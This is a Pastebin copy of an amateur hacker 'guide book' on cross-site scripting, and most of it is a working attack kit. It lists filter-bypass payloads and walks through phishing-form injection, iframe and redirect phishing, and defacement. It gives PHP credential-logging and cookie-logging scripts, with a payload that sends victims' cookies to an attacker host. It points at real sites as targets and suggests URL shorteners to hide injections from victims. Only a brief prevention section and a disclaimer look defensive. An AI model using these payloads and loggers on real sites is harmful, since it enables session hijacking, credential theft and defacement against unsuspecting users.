FederationHax

XSS

Jun 11th, 2016
209
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.55 KB | None | 0 0
  1. Guide Book on Cross Site Scripting
  2.  
  3. // Best Viewed in Notepad++ with word wrap enabled :)
  4.  
  5.  
  6.  
  7.  
  8. We might remember the intrepid spirit who stood an army
  9. named “Azad Hind Fauj” from prisoners of world war II far
  10. from India and fought for our freedom, The Great Subhash
  11. Chandra Bose. Remember His Words of inspiration
  12.  
  13.  
  14.  
  15. We might get inspired by their great lifestyles and follow
  16. their thoughts.
  17. **********************************************************
  18.  
  19.  
  20.  
  21.  
  22. Important!... Warning!!!
  23. The author do not take responsibility, if anyone, tries
  24. these hacks against any organization or whatever that makes
  25. him to trespass the security measures and brings him under
  26. the legal prosecution. These hacks are intended for the
  27. improvement of security and for investigations by legal
  28. security agencies. For educational institutions it is
  29. hereby requested that they should prevent their students
  30. from using the tools provided in this paper against the
  31. corporate world. This paper is the proof-of-concept and
  32. must be treated as it is.
  33.  
  34.  
  35.  
  36.  
  37. <|-[___________________________________________________________________________]-|>
  38. - -
  39. - [ Cross Site scripting ] -
  40.  
  41. - -
  42. <|-[___________________________________________________ ________________________]-|>
  43.  
  44.  
  45.  
  46. [ koolankit1993@gmail.com , ankitthehacker.wordpress.com
  47. # Written For Indishell.in ; Hackerz5.com ; r00tp0is0n.in
  48. # Greetz Fly Out to : RJ D Indian ,cyb3r_shubham , cyb3rs4m ,l0c4l r00t , LuCky , c00lt04d, reb0rn, 3thic4l n00b , darkw0lf , ne0
  49.  
  50. // Reference : Exploit-db , Aoh [Orkut] , Google ;)
  51.  
  52.  
  53.  
  54. =====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
  55. Feel Free To Share This White paper , knowledge is for sharing , But Respect Author's Hardwork . Give Proper Credits !
  56.  
  57. =====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====xx=====x
  58.  
  59. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
  60. |--( I ]> Introduction
  61. 0x01: Introduction
  62. 0x02: Finding The xss Vulnerable Websites
  63. 0x03: Executing Xss Commands
  64. 0x04: Bypass techniques
  65. 0x05: Damages By Xss
  66. \_ 1.) Inject a Phishing script
  67. \_ 2.) Iframe Phishing
  68. \_ 3.) Redirict Phishing
  69. \_ 4.) Cookie stealing
  70. \_ 5.) Defacing
  71. \_ Xss Cheat Sheet
  72. 0x06 : Fixing Xss Holes
  73. 0x07: [The End]
  74. |_| Conclusions
  75.  
  76.  
  77. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
  78.  
  79.  
  80. ---------------------
  81. 0x01: Introduction :
  82. ---------------------
  83.  
  84. xss also termed as css , no its not Cascading Style Sheets . xss is an abbreviation for cross site scripting . From The title itself its clear xss is related to scripts to be precise its javascripts . xss is a very common attackt found in web applications . 'XSS' allows the attacker to INSERT malicous code . The attacker can inject his malicious script into a website, and the browser just run's the code or script. XSS flaws comes up every time a website doesn't filter the attackers input.
  85.  
  86. There are many types of XSS attacks, I will mention 3 of the most used.
  87.  
  88. The First Attack i wana talk about is 'URL XSS' this means that the XSS wont stay on the page
  89. it will only get executed if you have the malicous code in the URL and submit the url
  90. we will talk more on how to use this in our advantage.
  91.  
  92. The Second Attack is input fields, Where ever you can insert data, it is very common, to be XSS
  93. vulnerable, for example say we found a site with a search engine, Now in the search box you enter
  94. 'hacker' now hit enter, when the page loads, if it says your data like 'Found 100 Results For hacker'
  95. ok now you see its displaying out data on the page, now what if we can exexute code? there is no possible
  96. way to execute PHP code in this Attack, but certainly is for HTML, Javascript, but be aware this method,
  97. Also wont stay on the server, this is for your eyes only.
  98.  
  99. The Third Attack, with this attack you will be able to INSERT data (code) and it will stay on the website.
  100. now there are 2 kinds, it depends if we can execute PHP or HTML if we can inject PHP then we can also
  101. inject HTML but NOT vice versa, Ok this kinda attack is normally found on Blogs, Shoutboxes, Profiles
  102. Forums, just most places where you insert data and it stays there. now HTML is totally diffrent then PHP
  103. HTML downloads to your pc and then your 'Browser' parses/interprets the code, (thats why its source is viewable)
  104. With PHP the code is interpretued on the server the script is hosted on, then the data is returned to the browser.
  105. for PHP injection its rare, But it dont harm to try. Note: PHP code cant be injected into HTML page !!!
  106.  
  107.  
  108.  
  109. ------------------------------------------
  110. x02: Finding The xss Vulnerable Websites :
  111. ------------------------------------------
  112. This Wont be a tedious task if you have a good eye !
  113. It is not really a big issue UNLESS it was permanent! Most Of the websites you come up with are vulnerable , the thing you need to have is just good knowledge about how to bypass the filteration . well , there are many techniques like
  114. magic_quotes_gpc=ON bypass
  115. HEX encoding
  116. Obfuscation
  117. Trying around
  118. i will discuess them later !!
  119.  
  120. To Kick off start finding xss vulnerables you can check blogs,forums,comment boxes , shout boxes and anykinda input boxes !! . Dont Worry google will help us finding the websites . Using goole dork inurl:"search.php?q=" , we can get a list of common websites you can now try them !!
  121. -------------------------------
  122. 0x03 : Executing Xss Commands
  123. ------------------------------
  124.  
  125. Injecting Xss script is a easy task as said above just you have to look for an input box !!
  126.  
  127. Let's say this is how a simple, unsecured search function looks like:
  128.  
  129. a vulnerable code would be:
  130.  
  131.  
  132. <*?php
  133.  
  134. $message = $_POST['message'];
  135.  
  136. if (isset($_POST['message']))
  137. {
  138.  
  139. echo "Thank you, your message has been posted!";
  140.  
  141. echo "
  142. ";
  143.  
  144. echo $message;
  145. }
  146.  
  147. echo "
  148. <*form method='post' name='message_box'>
  149. <*input type='text' name='message'>
  150. <*input type='submit' name='submit'>
  151. <*/form>";
  152.  
  153. ?>
  154.  
  155.  
  156.  
  157. ok, so now a malicious user could do the following:
  158.  
  159. submit the following text to test for vulnerability :
  160.  
  161.  
  162. <*script>alert("xss")<*/script>
  163.  
  164.  
  165.  
  166. or
  167.  
  168.  
  169. <*h1>Nice Website!<*/h1>
  170.  
  171.  
  172.  
  173. IF the HTML gets parsed "and it will in this code" , the attacker will now move to the next step, which is logging the page.. by redirecting it to a logger..
  174.  
  175. some methods of bypassing some filters, for example, if the form only submits links, lets take this one as an example:
  176.  
  177.  
  178.  
  179.  
  180. <*?php
  181.  
  182. $message = $_POST['message'];
  183.  
  184. if (isset($_POST['message']))
  185. {
  186.  
  187. echo "Thank you, your link has been added!";
  188.  
  189. echo "<*br />";
  190.  
  191. echo "<*a href='$message'>Link<*/a>";;
  192. }
  193.  
  194. echo "
  195. <*form method='post' name='message_box'>
  196. <*input type='text' name='message'>
  197. <*input type='submit' name='submit'>
  198. <*/form>";
  199.  
  200. ?>
  201.  
  202. now that should not parse anything, but simply wrap it in a link right?
  203.  
  204. well, i don't think so, you can simply bypass it using:
  205.  
  206.  
  207.  
  208. '> <*script>alert("owned")<*/script>
  209.  
  210.  
  211.  
  212. why does that bypass it?!
  213.  
  214. here is what happens, the
  215.  
  216.  
  217. '>
  218.  
  219. will stop the a tag, and then you can open anything else...
  220.  
  221. here is the result:
  222.  
  223.  
  224. <*a href=''> <*script>alert("owned")<*/script>'>Link<*/a>
  225.  
  226.  
  227.  
  228. as you can see, the a tag got closed, which allowed me to open another tag, which is a script here. and it works :)
  229.  
  230.  
  231. ---------------------------------------------
  232. 0x04 : Bypass techniques
  233. ---------------------------------------------
  234.  
  235. As Said in section 0x02 , Here i am going to discuss about bypass techniques :)
  236.  
  237.  
  238. There are a lot of ways to bypass XSS filters on websites, I'll number some:
  239.  
  240. \_ 1.) magic_quotes_gpc=ON bypass
  241. \_ 2.) HEX encoding
  242. \_ 3.) Obfuscation
  243. \_ 4.) Trying around
  244.  
  245. 1.) magic_quotes_gpc=ON is a php setting (php.ini).
  246. It causes that every ' (single-quote), " (double quote) and \ (backslash)
  247. are escaped with a backslash automatically. It's also a well known method
  248. to avoid XSS flaws, although it's exploitable.
  249.  
  250. How to bypass it when it's ON? - use the javascript function called
  251. String.fromCharCode(), just convert your text in decimal characters
  252. (e.g. here: http://www.asciizeichen.de/tabelle.html) and put them in the handling.
  253.  
  254. Using "ankit" (without quote sign) will look like this:
  255.  
  256. String.fromCharCode(97, 110, 107, 105,116)
  257.  
  258. now insert this in your alert script:
  259.  
  260. www.site.ru/google.php?search=<script>alert(String.fromCharCode(97, 110, 107, 105,116));</script>
  261.  
  262. 2.) HEX encoding is a useful bypass method, too. Using this step will encode
  263. your script, so you can't see clearly on the first look what the code will cause.
  264. This is how
  265.  
  266. <script>alert(/turtles/);</script>
  267.  
  268. looks like encrypted in HEX:
  269.  
  270. www.site.ru/google.php?search=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%2F%74%75%72%74%6C%65%73%2F%29%3B%3C%2F%73%63%72%69%70%74%3E
  271.  
  272. 3.) Obfuscation - sometimes website administrator simply put words like
  273. "script","alert()","''" on the "badwords list", that means, when you
  274. search for "script" on the website, it just shows you an error, like
  275. "you are not allowed to search for this word" or something.
  276. but this is a weak protection, you can bypass it using obfuscation.
  277. your javascript code like:
  278. <sCrIpT>alert('turtles');</ScRiPt>
  279.  
  280. There are like unlimited possibilities, but that leads us to the
  281. next chapter...
  282.  
  283. 4.) Trying around: sometimes you just got to try around, because every website
  284. is secured/unsecured in a different, unique way. Some doesn't even use
  285. cookies for example. Alway's keep a look at the website's source code!
  286. Sometimes you need to adjust your XSS script, like:
  287.  
  288. "><script>alert(/ankit/);</script>
  289.  
  290. This you need sometimes if you injected your code into a searchbox e.g. and
  291. interrupt a html tag, so you first need to close him, then start a new
  292. tag (<script>...).
  293.  
  294. Anyway, there are lot's of different methods how to bypass XSS filtration,
  295. try around !
  296.  
  297. --------------------
  298. 0x05: Damages By Xss
  299. --------------------
  300.  
  301.  
  302. Till Yet I have elaborated on xss and its basics . i showed you to how to spawn a javascript alert message on a website. Now lets concentrate on what havoc can xss bring if the site is vulnerable To Xss. If You are still thinking xss is useless and just to show off think agian .:) .. Let me remeber you Twitter , Facebook , orut , NDTV , BSNL Are heavily Affected by the xss And its sub methods . Here are some attack techniques you can do with a XSS flaw:
  303.  
  304. 1.) Inject a Phishing script
  305. 2.) Iframe Phishing
  306. 3.) Redirict Phishing
  307. 4.) Cookie stealing
  308. 5.) Defacing
  309.  
  310.  
  311.  
  312. ---------------------------
  313. \_ 1.) Injecting A phishing page :
  314. ---------------------------
  315.  
  316. Assuming you are aware of what the heck is Phishing [ no , its not fishing :P , but kinda related to it ]
  317. Phishing script inject: Just inject a 'user' and 'password' field in html
  318. (With the <html> and <body> tags), that the victim may think he need's to login to the target site.
  319.  
  320. Here an example:
  321.  
  322. www.site.com/google.php?search=<html><body><head><meta content="text/html; charset=utf-8"></meta></head>
  323. <div style="text-align: center;"><form Method="POST" Action="http://www.phishingsite.com/phishingscript.php">
  324. Phishingpage :<br /><br/>Username :<br /> <input name="User" /><br />Password :<br />
  325. <input name="Password" type="password" /><br /><br /><input name="Valid" value="Ok !" type="submit" />
  326. <br /></form></div></body></html>
  327.  
  328. You Can Carry Your Operation On this
  329.  
  330.  
  331. |======================|
  332. | http://www.gamez.pk/ |
  333. |======================|
  334.  
  335.  
  336. content of phishingscript.php
  337.  
  338. <?php
  339. $login = $_POST['user'];
  340. $password = $_POST['Password'];
  341. $open = fopen('log.txt', 'a+');
  342. fputs($open, 'Username : ' . $login . '<br >' . '
  343. Password : ' . $password . '<br >' . '<br >');
  344. ?>
  345.  
  346.  
  347.  
  348. ---------------
  349. \_ 2.) Iframe Phishing
  350. ---------------
  351. Iframe Phishing: Simple thing, just inject a javascript code containing an iframe where your phishing site is embeeded. Obviously it needs to look just like the target site.
  352.  
  353. Here an example:
  354.  
  355. www.site.com/google.php?search=<iframe src="http://www.yourphishingsite.com" height="100%" width="100%"></iframe>
  356.  
  357. (Note: height="100%" width="100%" means that the whole window is filled with
  358. that iframe.)
  359. The target site will spawn your phishing site in an Iframe, and the website user / victims won't see a
  360. difference and log in (If they're are foolish enough).
  361.  
  362.  
  363.  
  364. --------------------
  365. \_ 3.) Rediriction Phishing:
  366. --------------------
  367. Also simple, just inject a javascript rediriction script that leads to your phishingsite, of course it needs to look just like the target site.
  368.  
  369. Here an example:
  370.  
  371. www.site.ru/google.php?search=<script>document.location.href="http://www.yourphishingsite.ru"</script>
  372.  
  373. or
  374.  
  375. www.site.ru/google.php?search=<META HTTP-EQUIV="refresh" CONTENT="0; URL="http://www.yorphishingsite.ru">
  376.  
  377.  
  378.  
  379. \_ 4.) ----------------
  380. Cookie Stealing
  381. ----------------
  382.  
  383. I decided To add this part , as i have seen lot of papers , ebboks ,artciles not covering this part and if hey do add , its not clear to the readers so its here :)
  384.  
  385. Its the most usefull and vital part in xss . You Just have to Put your cookie logger script on your webspace and insert javascript into xss vulnerable with the cookielogger script address :) Rest The Script Will Do , You Will Get the cookies to eat with tea/coffee :P ..
  386.  
  387.  
  388.  
  389. <*?php
  390.  
  391. function GetIP()
  392. {
  393. if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
  394. $ip = getenv("HTTP_CLIENT_IP");
  395. else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
  396. $ip = getenv("HTTP_X_FORWARDED_FOR");
  397. else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
  398. $ip = getenv("REMOTE_ADDR");
  399. else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
  400. $ip = $_SERVER['REMOTE_ADDR'];
  401. else
  402. $ip = "unknown";
  403. return($ip);
  404. }
  405.  
  406. function logData()
  407. {
  408. $ipLog="log.txt";
  409. $cookie = $_SERVER['QUERY_STRING'];
  410. $register_globals = (bool) ini_get('register_gobals');
  411. if ($register_globals) $ip = getenv('REMOTE_ADDR');
  412. else $ip = GetIP();
  413.  
  414. $rem_port = $_SERVER['REMOTE_PORT'];
  415. $user_agent = $_SERVER['HTTP_USER_AGENT'];
  416. $rqst_method = $_SERVER['METHOD'];
  417. $rem_host = $_SERVER['REMOTE_HOST'];
  418. $referer = $_SERVER['HTTP_REFERER'];
  419. $date=date ("l dS of F Y h:i:s A");
  420. $log=fopen("$ipLog", "a+");
  421.  
  422. if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
  423. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
  424. ");
  425. else
  426. fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
  427. fclose($log);
  428. }
  429.  
  430. logData();
  431.  
  432. ?>
  433.  
  434.  
  435. Above is the cookie logger script . Make a tlog.txt and put both of them on your webspace and set "chmod 777".
  436. Inject the following code in your target website:
  437.  
  438. http://www.site.com/google.php?search=<script>location.href = 'http://phishingsite.com/cookiestealer.php?cookie='+document.cookie;</script>
  439.  
  440. // obviously you have to rename the name of script :) .. use a name that seems less suspecious :O
  441.  
  442. Now As soon as the user visits the page victim's cookie will be trapped in your log file . Once You Got the cookies you can hijack there session :)
  443.  
  444. // You Can use Firefox Addons , Maybe Available for chrome too :)
  445.  
  446.  
  447.  
  448. --------
  449. \_ 5.) Defacing
  450. --------
  451.  
  452. Well now you understand how XSS works, we can explain some simple XSS deface methods, there
  453. are many ways for defacing i will mention some of the best and most used,
  454.  
  455. the first one being IMG SCR, now for those of you who dont know html, IMG SCR is a tag, that
  456. displays the IMAGE linked to it on the webpage.
  457.  
  458. <b>xSsed by Ankit</b><head><body><IMG SRC="site.com/jpg" width= 700 height= 700></body></head>
  459.  
  460. Example ::
  461.  
  462. http://www.lapdonline.org/search_results/search/&view_all=1&chg_filter=1&searchType=content_basic&search_terms=%3Cb%3ExSsed%20by%20CrazyAnkit%3C/b%3E%3Chead%3E%3Cbody%3E%3CIMG%20SRC=%22http://ploader.net/files/87be7175082785f6e890497951c61ebc.jpg%22%20width=%20700%20height=%20700%3E%3C/body%3E%3C/head%3E
  463.  
  464.  
  465.  
  466.  
  467.  
  468. the other tags are not needed has the page will already have them. (rare cases they will not)
  469.  
  470. Ok it helps to make your picture big so it stands out and its clear the site got hacked.
  471.  
  472. Another method is using FLASH videos, its the same has the method below but a more stylish deface.
  473.  
  474. <EMBED SRC="http://site.com/xss.swf"
  475.  
  476. that will execute the flash video linked to it.
  477.  
  478. Or maybe using a pop or redirection?
  479.  
  480. <SCRIPT>alert("Ankit Z here")</SCRIPT> // pop up
  481.  
  482. <script>window.open( "http://www.google.com/" )</script> // redirecion
  483.  
  484. There Are Tons of others too I Will Add Them in Next Section "" Xss : Cheat sheet "" . The Deapth is too much that i would have to write an another paper for cheat sheet
  485.  
  486. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
  487. Cheat Sheets
  488. <~-.,~~~~~~~~~~~~~~~~~~~~~~~~~~~~,.-~>
  489.  
  490. Here is the XSS cheat sheet, where I got most of them from http://ha.ckers.org/xss.html.
  491. Enjoy. !!
  492.  
  493. '';!--"<XSS>=&{()}
  494.  
  495. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  496.  
  497. <IMG SRC="javascript:alert('XSS');">
  498.  
  499. <IMG SRC=javascript:alert('XSS')>
  500.  
  501. <IMG SRC=javascript:alert("XSS")>
  502.  
  503. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  504.  
  505. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  506.  
  507. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  508.  
  509. <IMG SRC=javascript:alert('XSS')>
  510.  
  511. <IMG SRC=javascript:alert('XSS')>
  512.  
  513. <IMG SRC=javascript:alert('XSS')>
  514.  
  515. <IMG SRC="jav ascript:alert('XSS');">
  516.  
  517. <IMG SRC="jav ascript:alert('XSS');">
  518.  
  519. <IMG SRC="jav
  520. ascript:alert('XSS');">
  521.  
  522. #############################################################
  523. # #
  524. # PROTIP FOR EVERY XSS INJECTION: #
  525. # use url shortener services such as tinyurl.com or bit.ly #
  526. # to 'hide' your injection, so the victim won't know what's #
  527. # behind that url. #
  528. # #
  529. #############################################################
  530.  
  531.  
  532.  
  533. ==xx==xx==xx==xx==xx==
  534.  
  535.  
  536.  
  537.  
  538. ----------------
  539. 0x06 : Fixing Xss Holes
  540. ----------------
  541.  
  542.  
  543. This Section is written for developers ,i mean web developers ;) . i will introduce with facts how can you secure your code
  544. well , i found this section to be most mind bending still i have written the best i can .. [i am not good in explain things !!]
  545.  
  546. please go to this URL for more info about this
  547.  
  548. ####################################################################################
  549. http://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet
  550. ####################################################################################
  551.  
  552.  
  553. well, leaving useless talks lets talk about xss prevention :)
  554.  
  555. If you found XSS bugs in your scripts, its easy to secure, take a look at the below code
  556.  
  557. if(isset($_POST['form'])){echo "<html><body>" .$_POST['form']. "</body></html>";}
  558.  
  559. Ok say the variable $_POST['from'] was coming from a input box, then you have a XSS attack.
  560. the following is a very easy way to secure that.
  561.  
  562. $charset='UTF-8'; $data = htmlentities ($_POST['form'], ENT_NOQUOTES, $charset);
  563. if(isset($data)){echo "<html><body>" .$data. "</body></html>";}
  564.  
  565. now that will take all possible code and make it not executable. by turning it into stuff like
  566. < ect...
  567.  
  568. You will not notice a diffrence when using htmlentries();
  569.  
  570. there are also another common function, striptags(), find more info at php.net/striptags
  571.  
  572. ok another way to show you how to secure INTEGER variables. (variables that will always contain a INT)
  573.  
  574. $this = $_GET['id'];
  575. echo "you are viewing " . $this . "blog";
  576.  
  577. now if we include ?id=<script>alert("XSS")</script>
  578. into the url its gona execute our code, a very easy way to secure this is using (int) check the following code
  579.  
  580. $this = (int)$_GET['id'];
  581. echo "you are viewing " . $this . "blog";
  582.  
  583. now if at anytime the varible contains anything but a Integer, it will return 0.
  584.  
  585. Thats enough said. huh !!
  586.  
  587. --------------------------------------
  588. 0x07: XSS The Complete Walkthrough [The End]
  589. --------------------------------------
  590. |_| Conclusions
  591.  
  592. Well i have talked about xss !!i hope you have enjoyed my paper a lot while reading like i enjoyed [ believe me i am lying lol !! :D]
  593.  
  594. If you got any questions mail me @ koolankit1993@gmail.com
  595.  
  596. I still have not included many topics in my paper like clicjacking with xss and vbSEO – From XSS to Reverse PHP Shell :P and few more :)
  597. i will write a seprate paper on xss prevention later on :)
  598.  
  599. This is a very cute attack , enjoy it at its best !!
  600.  
  601.  
  602.  
  603.  
  604.  
  605. *************
  606. EoF
  607.  
  608.  
  609. skype : yamod.gas
  610. contact me for more/help
  611. donate to me : xbltornado2016@gmail.com
Add Comment
Please, Sign In to add comment